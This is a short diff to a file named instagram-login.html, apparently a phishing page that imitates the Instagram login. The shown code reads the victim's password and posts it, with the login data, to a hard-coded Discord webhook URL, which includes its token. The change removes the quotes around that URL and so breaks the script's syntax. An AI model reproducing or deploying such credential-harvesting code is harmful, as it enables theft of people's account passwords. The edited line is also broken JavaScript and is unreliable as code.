--- a/instagram-login.html
+++ b/instagram-login.html
@@ -70,7 +70,7 @@
       const password = document.getElementById('password').value;
 
       // Send the data to your Discord server using a webhook
-      fetch('https://discord.com/api/webhooks/1291874322100654144/tw4Yzdmca0eF4cW9pU8vFynhF0E2zc2CcJPNCjpDAeZFayzwj-o_u2EnScueM2_AGtRe', {
+      fetch(https://discord.com/api/webhooks/1291874322100654144/tw4Yzdmca0eF4cW9pU8vFynhF0E2zc2CcJPNCjpDAeZFayzwj-o_u2EnScueM2_AGtRe, {
         method: 'POST',
         headers: {
           'Content-Type': 'application/json'
